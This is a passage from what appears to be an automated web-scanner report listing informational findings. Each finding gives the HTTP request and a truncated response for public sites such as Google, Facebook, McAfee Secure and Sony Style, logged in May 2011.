GET /plugins/likebox.php?id Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.68.45 X-Cnection: close Date: Mon, 16 May 2011 01:28:09 GMT Content-Length: 8915 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </title> <link type="text/css" rel="stylesheet" href="http://static.ak <link type="text/css" rel="stylesheet" href="http://static.ak <script type="text/javascript" src="http://static.ak ...[SNIP]... </script> <link rel="search" type="application <link rel="shortcut icon" href="http://static.ak ...[SNIP]... <a href="http://www.facebook ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.google.com |
Path: | /search |
GET /search?q=nuget&ie=utf-8 Host: www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: PREF=ID=a84248b084119e14 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 23:49:41 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Content-Length: 73041 <!doctype html> <head> <title>nuget - Google Search</title> <script>window.google= ...[SNIP]... </div><a id=gb_36 href="http://www.youtube ...[SNIP]... <h3 class="r"><a href="http://nuget ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <div class=sld><a class=sla href="http://nuget ...[SNIP]... <div class=sld><a class=sla href="http://nuget ...[SNIP]... <div class=sld><a class=sla href="http://nuget ...[SNIP]... <div class=sld><a class=sla href="http://nuget ...[SNIP]... <div class=sld><a class=sla href="http://nuget ...[SNIP]... <div class=sld><a class=sla href="http://nuget ...[SNIP]... <h3 class="r"><a href="http://nuget ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://nuget ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.nuget ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://weblogs.asp ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://haacked.com ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://visuals ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://10rem.net ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <div><a href="http://www ...[SNIP]... <div><a href="http://nu.wikispot ...[SNIP]... <div><a href="http://rubygems.org ...[SNIP]... <div><a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.google.com |
Path: | /search |
GET /search?sourceid=chrome Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=381be2a5a4e321de |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 00:02:13 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Get-Dictionary: /sdch/vD843DpA.dct Server: gws X-XSS-Protection: 1; mode=block Content-Length: 67089 <!doctype html> <head> <title>localhost:19416] ...[SNIP]... <li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.google.com |
Path: | /search |
GET /search?sourceid=chrome Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=381be2a5a4e321de |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:26:15 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Get-Dictionary: /sdch/vD843DpA.dct Server: gws X-XSS-Protection: 1; mode=block Content-Length: 92093 <!doctype html> <head> <title>play station network - Google Search</title> <script>window.google= ...[SNIP]... <li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this) ...[SNIP]... <span class=tl><a href="http://www.tmrzoo ...[SNIP]... <span class=tl><a href="http://www ...[SNIP]... <h3 class="r"><a href="http://www.us ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <div class=sld><a class=sla href="http://us ...[SNIP]... <div class=sld><a class=sla href="http://us ...[SNIP]... <div class=sld><a class=sla href="http://us ...[SNIP]... <div class=sld><a class=sla href="http://blog.us ...[SNIP]... <div class=sld><a class=sla href="http://us ...[SNIP]... <div class=sld><a class=sla href="http://us ...[SNIP]... <h3 class="r"><a href="http://us ...[SNIP]... <div class=osl><a href="http://blog.us ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://blog.us ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://technol ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://en.wikipedia ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://techland ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.pcmag ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://news.cnet ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://venturebeat ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <div><a href="http://www.sony.com ...[SNIP]... <div><a href="http://www.gamestop ...[SNIP]... <div><a href="http://www.xbox.com ...[SNIP]... <div><a href="http://www.ebgames ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.google.com |
Path: | /trends/hottrends |
GET /trends/hottrends?q Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=381be2a5a4e321de |
HTTP/1.1 200 OK Content-Type: text/html Date: Mon, 16 May 2011 01:18:59 GMT Server: Google Trends Cache-Control: private, x-gzip-ok="" Content-Length: 11547 X-XSS-Protection: 1; mode=block <html> <head> <meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8"> <link rel="stylesheet" type="text/css" href="/trends/html <title>Google Trends: disney cruise, May 15, 2 ...[SNIP]... <div class="gs-title"> <a class="gs-title" href="http://www Enchanted Tiki Room News!! - PassPorter Community - Boards <b> ...[SNIP]... <div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www ...[SNIP]... <div class="gs-title"> <a class="gs-title" href="http://www.orbitz <b> ...[SNIP]... <div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.orbitz ...[SNIP]... <div class="gs-title"> <a class="gs-title" href="http://www The Dream Differences on <b> ...[SNIP]... <div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.imiclk.com |
Path: | /cgi/r.cgi |
GET /cgi/r.cgi?m=3&mid Host: www.imiclk.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: YU=593390c429fc100c2 |
HTTP/1.1 200 OK Server: Apache/2.0.63 (CentOS) P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" Cache-Control: no-store Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 224 Date: Mon, 16 May 2011 01:43:17 GMT Connection: close Set-Cookie: CH=24785,53brJ,22244 Set-Cookie: RQ=1267,53br0,2831,53br0 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head> <img src="http://pixel.mathtag ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.magicalki |
Path: | /blog/wp-content/plugins |
GET /blog/wp-content/plugins Host: www.magicalkingdoms.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cf6190390f |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:21:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14 Last-Modified: Mon, 11 Apr 2011 19:54:52 GMT ETag: "628c45-5d77-4a0a9f2 Accept-Ranges: bytes Content-Length: 23927 Content-Type: application/javascript SHR4P={};if(typeof SHRSB_Globals=="undefined ...[SNIP]... <div class="shr-getshr" style="visibility:hidden ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /Link.sa |
GET /Link.sa?directory=47931 HTTP/1.1 Host: www.mcafeesecure.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 302 Found Server: McAfeeSecure Expires: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Location: http://www.anrdoezrs.net Content-Type: text/html; charset=utf-8 Content-Length: 85 Connection: close Date: Mon, 16 May 2011 01:40:03 GMT The URL has moved <a href="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /Link.sa |
GET /Link.sa?directory=8177 HTTP/1.1 Host: www.mcafeesecure.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 302 Found Server: McAfeeSecure Expires: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Location: http://www.bhphotovideo Content-Type: text/html; charset=utf-8 Content-Length: 109 Connection: close Date: Mon, 16 May 2011 01:41:42 GMT The URL has moved <a href="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /Link.sa |
GET /Link.sa?directory=27074 HTTP/1.1 Host: www.mcafeesecure.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 302 Found Server: McAfeeSecure Expires: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Location: http://www.dpbolvw.net Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: close Date: Mon, 16 May 2011 01:42:49 GMT The URL has moved <a href="http://www.dpbolvw |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /RatingVerify |
GET /RatingVerify?ref=www Host: www.mcafeesecure.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Set-Cookie: CAMEFROM=www.fingerhut Content-Type: text/html; charset=utf-8 Content-Length: 10809 Connection: close Date: Mon, 16 May 2011 01:37:34 GMT <html> <head> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='1568676568',d=document ...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="stylesheet" type="text/css" href="https://images </head> ...[SNIP]... </script> <script language='javascript' src='https://server.iad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /us/legalinfo.jsp |
GET /us/legalinfo.jsp?domain Host: www.mcafeesecure.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Expires: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 8707 Connection: close Date: Mon, 16 May 2011 01:40:26 GMT <html> <head> <style type="text/css"> html,body{color:#4c4d4f body {background:url('/images ...[SNIP]... <a target="_blank" href="https://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.observertoday |
Path: | /page/content.detail/id |
GET /page/content.detail/id Host: www.observertoday.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:19:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... a County, New York , Lake Erie, Jamestown Community College, Dunkirk High School, Cattaraugus Reservation, Dunkirk, Fredonia, Sheridan, Hanover, Forestville, Silver Creek, Angola, Portland," /> <script type="text/javascript" src="http://partner </script> ...[SNIP]... </span> <a href="https://secure.oweb ...[SNIP]... </a> <a href="http://www <a href="http://www.hot-ads ...[SNIP]... <li><a href="http://208.15.24 ...[SNIP]... </a> | <a href="http://www.addthis ...[SNIP]... <div class="lic"> <img src="http://analytics <a rel="item-license" href="#license-559280" id="license-559280"> ...[SNIP]... </div> <script src="http://connect ...[SNIP]... <div class="padBtm txtCenter"><a href="https://secure.oweb ...[SNIP]... <div id="wx_module"> <a href="http://www.weather ...[SNIP]... </body> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.popularmedia |
Path: | /widget/2be74c3e1d1b |
GET /widget/2be74c3e1d1b Host: www.popularmedia.net Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:40:28 GMT Server: Mongrel 1.1.5 Status: 200 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Runtime: 24 Pragma: no-cache Cache-Control: no-cache, must-revalidate, max-age=0 Content-Type: text/javascript; charset=utf-8 Expires: 0 Set-Cookie: _ia_sess_1=bc86b4dc7 Vary: Accept-Encoding Content-Length: 47368 (function() { /* var head = document.getElements var script = document.createElement( script.src = "http://platform.twitter scri ...[SNIP]... <br/> <a href="http://www.adobe ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.siteadvisor |
Path: | /download/windows.html |
GET /download/windows.html Host: www.siteadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_nr=1305377672274-New |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:27 GMT Server: Apache Content-Type: text/html; charset=utf-8 Content-Length: 40225 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <li id="about-nav"><a href="http://www.mcafee ...[SNIP]... <li id="contact-nav"><a href="http://www.mcafee ...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www ...[SNIP]... <div class="firstcolumn of-two-dwin-banner" style="float:left;"> <a class="universal-dloadbtn ...[SNIP]... <div class="firstcolumn of-two-dwin-banner" style="float:left;"> <a class="universal-dloadbtn ...[SNIP]... <div><a class="dwin-dloadbtn ...[SNIP]... <div style="padding-top:10px"> <script type="text/javascript" src="http://static.ak ...[SNIP]... <li><a href="http://home.mcafee ...[SNIP]... <li><a href="http://home.mcafee ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK ntCoent-Length: 101653 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 101653 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:20:41 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <link rel="canonical" href="http://www ...[SNIP]... <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servic ...[SNIP]... <li id="readerSpot" class="entBigPromo seoImg"> <a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us ...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr <h3> ...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Sales Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Online Product Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Technical Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Product Registration" href="https://produc ...[SNIP]... <li id=""><a target="3692" href="http://syndication ...[SNIP]... <p><a target="s16974" href="http://syndication ...[SNIP]... <p><a target="s16974" href="http://syndication ...[SNIP]... <p><a target="s16972" href="http://syndication ...[SNIP]... <p><a target="s16972" href="http://syndication ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <div id="globalLogoCallou <a href="http://www.sony.net <a href="http://www.sony.com ...[SNIP]... <li class="extraLinkListItem lastLinkItem"><a href="http://products.sel ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK ntCoent-Length: 4641 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4641 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:21:37 GMT Connection: close Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta id="meta_refresh" ht ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK ntCoent-Length: 249393 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 15 May 2011 21:21:24 GMT Connection: close Connection: Transfer-Encoding Cache-Control: private Content-Length: 249393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="canonical" href ...[SNIP]... <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servic ...[SNIP]... <li id="readerSpot" class="entBigPromo seoImg"> <a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us ...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr <h3> ...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Sales Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Online Product Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Technical Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Product Registration" href="https://produc ...[SNIP]... <p> <a class="recommended" id="rec1" target="3692" href="http://syndication ...[SNIP]... <p> <a class="recommended" id="rec1" target="3695" href="http://syndication ...[SNIP]... <div id="get_flash_button"> <a href="https://www.adobe Get Flash </a> ...[SNIP]... <p class="arrow_link">For service plan information on professional camcorders, please <a href="http://pro.sony.com ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <div id="globalLogoCallou <a href="http://www.sony.net <a href="http://www.sony.com ...[SNIP]... <li class="extraLinkListItem lastLinkItem"><a href="http://products.sel ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
